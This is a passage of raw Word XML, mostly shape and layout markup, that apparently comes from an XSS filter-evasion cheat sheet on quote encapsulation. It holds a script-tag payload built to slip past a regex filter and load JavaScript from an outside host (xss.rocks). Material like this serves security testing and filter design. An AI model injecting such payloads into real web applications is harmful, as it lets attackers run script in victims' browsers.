                              <a:gd name="T4" fmla="+- 0 9679 9658"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 765 583"/>
                              <a:gd name="T7" fmla="*/ 765 h 183"/>
                              <a:gd name="T8" fmla="+- 0 9676 9658"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 764 583"/>
                              <a:gd name="T11" fmla="*/ 764 h 183"/>
                              <a:gd name="T12" fmla="+- 0 9658 9658"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 744 583"/>
                              <a:gd name="T15" fmla="*/ 744 h 183"/>
                              <a:gd name="T16" fmla="+- 0 9658 9658"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 741 583"/>
                              <a:gd name="T19" fmla="*/ 741 h 183"/>
                              <a:gd name="T20" fmla="+- 0 9658 9658"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 604 583"/>
                              <a:gd name="T23" fmla="*/ 604 h 183"/>
                              <a:gd name="T24" fmla="+- 0 9679 9658"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 583 583"/>
                              <a:gd name="T27" fmla="*/ 583 h 183"/>
                              <a:gd name="T28" fmla="+- 0 10293 9658"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 583 583"/>
                              <a:gd name="T31" fmla="*/ 583 h 183"/>
                              <a:gd name="T32" fmla="+- 0 10314 9658"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 604 583"/>
                              <a:gd name="T35" fmla="*/ 604 h 183"/>
                              <a:gd name="T36" fmla="+- 0 10314 9658"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 744 583"/>
                              <a:gd name="T39" fmla="*/ 744 h 183"/>
                              <a:gd name="T40" fmla="+- 0 10296 9658"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 764 583"/>
                              <a:gd name="T43" fmla="*/ 764 h 183"/>
                              <a:gd name="T44" fmla="+- 0 10293 9658"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 765 583"/>
                              <a:gd name="T47" fmla="*/ 76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35" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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Text Box 622"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="9657" y="582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&lt;SCRIPT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1" o:spid="_x0000_s1809" style="position:absolute;left:0;text-align:left;margin-left:482.9pt;margin-top:29.15pt;width:32.85pt;height:9.15pt;z-index:15870464;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="9658,583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">
                <v:shape id="Freeform 623" o:spid="_x0000_s1810" style="position:absolute;left:9657;top:582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CyP8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AEb2tiD/7pGkUEQVEPWxX2+Gje&#10;tmWbl9JErd/eCMIeh5n5DTNfdrYWN2p95VjDaKhAEOfOVFxoOJ82n1MQPiAbrB2Thgd5WC56H3NM&#10;jbvzN92yUIgIYZ+ihjKEJpXS5yVZ9EPXEEfv17UWQ5RtIU2L9wi3tUyUGkuLFceFEhtal5T/ZVer&#10;IWTTi0p8bgtUB78/Jvvdz2yi9aDfrb5ABOrCf/jd3hoN42QErzPxCM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CyP8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m635,182r-614,l18,181,,161r,-3l,21,21,,635,r21,21l656,161r-18,20l635,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,765;21,765;18,764;0,744;0,741;0,604;21,583;635,583;656,604;656,744;638,764;635,765" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 622" o:spid="_x0000_s1811" type="#_x0000_t202" style="position:absolute;left:9657;top:582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/7Bs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rI0hf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f+wb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&lt;SCRIPT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XSS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Quote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Encapsulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="144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102" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="773" w:hanging="620"/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15869952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4928870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="478790" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="617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790" cy="116205"/>
                          <a:chOff x="7762" y="108"/>
                          <a:chExt cx="754" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="618" name="Freeform 620"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7762" y="108"/>
                            <a:ext cx="754" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8495 7762"/>
                              <a:gd name="T1" fmla="*/ T0 w 754"/>
                              <a:gd name="T2" fmla="+- 0 290 108"/>
                              <a:gd name="T3" fmla="*/ 290 h 183"/>
                              <a:gd name="T4" fmla="+- 0 7783 7762"/>
                              <a:gd name="T5" fmla="*/ T4 w 754"/>
                              <a:gd name="T6" fmla="+- 0 290 108"/>
                              <a:gd name="T7" fmla="*/ 290 h 183"/>
                              <a:gd name="T8" fmla="+- 0 7780 7762"/>
                              <a:gd name="T9" fmla="*/ T8 w 754"/>
                              <a:gd name="T10" fmla="+- 0 290 108"/>
                              <a:gd name="T11" fmla="*/ 290 h 183"/>
                              <a:gd name="T12" fmla="+- 0 7762 7762"/>
                              <a:gd name="T13" fmla="*/ T12 w 754"/>
                              <a:gd name="T14" fmla="+- 0 269 108"/>
                              <a:gd name="T15" fmla="*/ 269 h 183"/>
                              <a:gd name="T16" fmla="+- 0 7762 7762"/>
                              <a:gd name="T17" fmla="*/ T16 w 754"/>
                              <a:gd name="T18" fmla="+- 0 266 108"/>
                              <a:gd name="T19" fmla="*/ 266 h 183"/>
                              <a:gd name="T20" fmla="+- 0 7762 7762"/>
                              <a:gd name="T21" fmla="*/ T20 w 754"/>
                              <a:gd name="T22" fmla="+- 0 129 108"/>
                              <a:gd name="T23" fmla="*/ 129 h 183"/>
                              <a:gd name="T24" fmla="+- 0 7783 7762"/>
                              <a:gd name="T25" fmla="*/ T24 w 754"/>
                              <a:gd name="T26" fmla="+- 0 108 108"/>
                              <a:gd name="T27" fmla="*/ 108 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8495 7762"/>
                              <a:gd name="T29" fmla="*/ T28 w 754"/>
                              <a:gd name="T30" fmla="+- 0 108 108"/>
                              <a:gd name="T31" fmla="*/ 108 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8516 7762"/>
                              <a:gd name="T33" fmla="*/ T32 w 754"/>
                              <a:gd name="T34" fmla="+- 0 129 108"/>
                              <a:gd name="T35" fmla="*/ 129 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8516 7762"/>
                              <a:gd name="T37" fmla="*/ T36 w 754"/>
                              <a:gd name="T38" fmla="+- 0 269 108"/>
                              <a:gd name="T39" fmla="*/ 269 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8498 7762"/>
                              <a:gd name="T41" fmla="*/ T40 w 754"/>
                              <a:gd name="T42" fmla="+- 0 290 108"/>
                              <a:gd name="T43" fmla="*/ 290 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8495 7762"/>
                              <a:gd name="T45" fmla="*/ T44 w 754"/>
                              <a:gd name="T46" fmla="+- 0 290 108"/>
                              <a:gd name="T47" fmla="*/ 29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54" h="183">
                                <a:moveTo>
                                  <a:pt x="73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33" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="754" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="754" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="736" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="73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Text Box 619"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7762" y="108"/>
                            <a:ext cx="75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4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8" o:spid="_x0000_s1812" style="position:absolute;left:0;text-align:left;margin-left:388.1pt;margin-top:5.4pt;width:37.7pt;height:9.15pt;z-index:15869952;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7762,108" coordsize="75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">
                <v:shape id="Freeform 620" o:spid="_x0000_s1813" style="position:absolute;left:7762;top:108;width:754;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="75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GGG78A&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdD/gP4QruxrQuRKpRRBQUFz4/4NJc29rm&#10;pjbR1vn6yUJweTjv2aIzlXhR4wrLCuJhBII4tbrgTMH1svmdgHAeWWNlmRS8ycFi3vuZYaJtyyd6&#10;nX0mQgi7BBXk3teJlC7NyaAb2po4cDfbGPQBNpnUDbYh3FRyFEVjabDg0JBjTauc0vL8NAqyy14e&#10;HtKu/uIJ38v2uKbdrVRq0O+WUxCeOv8Vf9xbrWAch7XhTDgCcv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0YYbvwAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" path="m733,182r-712,l18,182,,161r,-3l,21,21,,733,r21,21l754,161r-18,21l733,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="733,290;21,290;18,290;0,269;0,266;0,129;21,108;733,108;754,129;754,269;736,290;733,290" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 619" o:spid="_x0000_s1814" type="#_x0000_t202" style="position:absolute;left:7762;top:108;width:75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ejysQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGD6FGVxFREAqlMR48PrPP&#10;ZDH7NmZXTf99tyB4HGbmG2a+7G0j7tR541jBeJSAIC6dNlwpOBTbj08QPiBrbByTgl/ysFwM3uaY&#10;affgnO77UIkIYZ+hgjqENpPSlzVZ9CPXEkfv7DqLIcqukrrDR4TbRk6SJJUWDceFGlta11Re9jer&#10;YHXkfGOu36ef/Jybopgm/JVelHof9qsZiEB9eIWf7Z1WkI6n8H8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Xo8r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4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&lt;SCRIPT&gt;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6870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238760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="370840" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="614" name="Group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116205"/>
                          <a:chOff x="1614" y="376"/>
                          <a:chExt cx="584" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="615" name="Freeform 617"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="375"/>
                            <a:ext cx="584" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2177 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 584"/>
                              <a:gd name="T2" fmla="+- 0 558 376"/>
                              <a:gd name="T3" fmla="*/ 558 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 584"/>
                              <a:gd name="T6" fmla="+- 0 558 376"/>
                              <a:gd name="T7" fmla="*/ 558 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 584"/>
                              <a:gd name="T10" fmla="+- 0 557 376"/>
                              <a:gd name="T11" fmla="*/ 557 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 584"/>
                              <a:gd name="T14" fmla="+- 0 537 376"/>
                              <a:gd name="T15" fmla="*/ 537 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 584"/>
                              <a:gd name="T18" fmla="+- 0 533 376"/>
                              <a:gd name="T19" fmla="*/ 533 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 584"/>
                              <a:gd name="T22" fmla="+- 0 397 376"/>
                              <a:gd name="T23" fmla="*/ 397 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 584"/>
                              <a:gd name="T26" fmla="+- 0 376 376"/>
                              <a:gd name="T27" fmla="*/ 376 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2177 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 584"/>
                              <a:gd name="T30" fmla="+- 0 376 376"/>
                              <a:gd name="T31" fmla="*/ 376 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2198 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 584"/>
                              <a:gd name="T34" fmla="+- 0 397 376"/>
                              <a:gd name="T35" fmla="*/ 397 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2198 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 584"/>
                              <a:gd name="T38" fmla="+- 0 537 376"/>
                              <a:gd name="T39" fmla="*/ 537 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2180 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 584"/>
                              <a:gd name="T42" fmla="+- 0 557 376"/>
                              <a:gd name="T43" fmla="*/ 557 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2177 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 584"/>
                              <a:gd name="T46" fmla="+- 0 558 376"/>
                              <a:gd name="T47" fmla="*/ 55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84" h="183">
                                <a:moveTo>
                                  <a:pt x="56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63" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="584" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="584" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="566" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56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Text Box 61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375"/>
                            <a:ext cx="5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SRC...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5" o:spid="_x0000_s1815" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.8pt;width:29.2pt;height:9.15pt;z-index:-17547776;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,376" coordsize="58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">
                <v:shape id="Freeform 617" o:spid="_x0000_s1816" style="position:absolute;left:1614;top:375;width:584;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="58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hx8sUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzW7CMBCE70h9B2srcQMnCFCVYlAL4qdwaWkfYBsv&#10;SdR4bcUmhLfHSJU4jmbmG81s0ZlatNT4yrKCdJiAIM6trrhQ8PO9HryA8AFZY22ZFFzJw2L+1Jth&#10;pu2Fv6g9hkJECPsMFZQhuExKn5dk0A+tI47eyTYGQ5RNIXWDlwg3tRwlyVQarDgulOhoWVL+dzwb&#10;BcX+9/TRardKP6vD+ODeN6vtxijVf+7eXkEE6sIj/N/eaQXTdAL3M/E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uHHyxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m563,182r-542,l18,181,,161r,-4l,21,21,,563,r21,21l584,161r-18,20l563,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="563,558;21,558;18,557;0,537;0,533;0,397;21,376;563,376;584,397;584,537;566,557;563,558" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 616" o:spid="_x0000_s1817" type="#_x0000_t202" style="position:absolute;left:1614;top:375;width:58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g3uMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IK3upGD8GmriJFQRDEmB56fM0+&#10;k8Xs25hdNf57VxB6HGbmG2a26G0jrtR541jBeJSAIC6dNlwp+CnWH1MQPiBrbByTgjt5WMwHbzPM&#10;tLtxTtdDqESEsM9QQR1Cm0npy5os+pFriaN3dJ3FEGVXSd3hLcJtIydJkkqLhuNCjS1911SeDher&#10;YPnL+cqcd3/7/JibovhMeJuelBq+98svEIH68B9+tTdaQTpO4X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IN7j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SRC...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769216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2483485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>238760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1226820" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="613" name="Freeform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26820" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 5822 3911"/>
                            <a:gd name="T1" fmla="*/ T0 w 1932"/>
                            <a:gd name="T2" fmla="+- 0 558 376"/>
                            <a:gd name="T3" fmla="*/ 558 h 183"/>
                            <a:gd name="T4" fmla="+- 0 3932 3911"/>
                            <a:gd name="T5" fmla="*/ T4 w 1932"/>
                            <a:gd name="T6" fmla="+- 0 558 376"/>
                            <a:gd name="T7" fmla="*/ 558 h 183"/>
                            <a:gd name="T8" fmla="+- 0 3929 3911"/>
                            <a:gd name="T9" fmla="*/ T8 w 1932"/>
                            <a:gd name="T10" fmla="+- 0 557 376"/>
                            <a:gd name="T11" fmla="*/ 557 h 183"/>
                            <a:gd name="T12" fmla="+- 0 3911 3911"/>
                            <a:gd name="T13" fmla="*/ T12 w 1932"/>
                            <a:gd name="T14" fmla="+- 0 537 376"/>
                            <a:gd name="T15" fmla="*/ 537 h 183"/>
                            <a:gd name="T16" fmla="+- 0 3911 3911"/>
                            <a:gd name="T17" fmla="*/ T16 w 1932"/>
                            <a:gd name="T18" fmla="+- 0 533 376"/>
                            <a:gd name="T19" fmla="*/ 533 h 183"/>
                            <a:gd name="T20" fmla="+- 0 3911 3911"/>
                            <a:gd name="T21" fmla="*/ T20 w 1932"/>
                            <a:gd name="T22" fmla="+- 0 397 376"/>
                            <a:gd name="T23" fmla="*/ 397 h 183"/>
                            <a:gd name="T24" fmla="+- 0 3932 3911"/>
                            <a:gd name="T25" fmla="*/ T24 w 1932"/>
                            <a:gd name="T26" fmla="+- 0 376 376"/>
                            <a:gd name="T27" fmla="*/ 376 h 183"/>
                            <a:gd name="T28" fmla="+- 0 5822 3911"/>
                            <a:gd name="T29" fmla="*/ T28 w 1932"/>
                            <a:gd name="T30" fmla="+- 0 376 376"/>
                            <a:gd name="T31" fmla="*/ 376 h 183"/>
                            <a:gd name="T32" fmla="+- 0 5843 3911"/>
                            <a:gd name="T33" fmla="*/ T32 w 1932"/>
                            <a:gd name="T34" fmla="+- 0 397 376"/>
                            <a:gd name="T35" fmla="*/ 397 h 183"/>
                            <a:gd name="T36" fmla="+- 0 5843 3911"/>
                            <a:gd name="T37" fmla="*/ T36 w 1932"/>
                            <a:gd name="T38" fmla="+- 0 537 376"/>
                            <a:gd name="T39" fmla="*/ 537 h 183"/>
                            <a:gd name="T40" fmla="+- 0 5825 3911"/>
                            <a:gd name="T41" fmla="*/ T40 w 1932"/>
                            <a:gd name="T42" fmla="+- 0 557 376"/>
                            <a:gd name="T43" fmla="*/ 557 h 183"/>
                            <a:gd name="T44" fmla="+- 0 5822 3911"/>
                            <a:gd name="T45" fmla="*/ T44 w 1932"/>
                            <a:gd name="T46" fmla="+- 0 558 376"/>
                            <a:gd name="T47" fmla="*/ 558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1932" h="183">
                              <a:moveTo>
                                <a:pt x="1911" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="181"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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1911" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1932" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1932" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1914" y="181"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1911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5B36A" id="Freeform 614" o:spid="_x0000_s1026" style="position:absolute;margin-left:195.55pt;margin-top:18.8pt;width:96.6pt;height:9.15pt;z-index:-1754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3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" path="m1911,182l21,182r-3,-1l,161r,-4l,21,21,,1911,r21,21l1932,161r-18,20l1911,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1213485,354330;13335,354330;11430,353695;0,340995;0,338455;0,252095;13335,238760;1213485,238760;1226820,252095;1226820,340995;1215390,353695;1213485,354330" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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tested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IE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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mileage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vary.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performing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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sites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allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>way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regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:w w:val="95"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>/\&lt;script\[^\&gt;\]+src/i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-50"/>
          <w:w w:val="95"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>allow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num="2" w:space="708" w:equalWidth="0">
            <w:col w:w="6306" w:space="634"/>
            <w:col w:w="2080"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8" w:after="1"/>
        <w:rPr>
          <w:sz w:val="13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2886075" cy="116205"/>
                <wp:effectExtent l="5715" t="7620" r="3810" b="0"/>
                <wp:docPr id="610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6075" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4545" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="611" name="Freeform 6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45" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4523 w 4545"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 4545"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 4545"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 4545"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 4545"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 4545"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 4545"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 4523 w 4545"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 4544 w 4545"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 4544 w 4545"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 4526 w 4545"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 4523 w 4545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45" h="183">
                                <a:moveTo>
                                  <a:pt x="452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523" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4544" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4544" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4526" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="452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Text Box 6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54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a="&gt;"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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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11" o:spid="_x0000_s1818" style="width:227.25pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="454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">
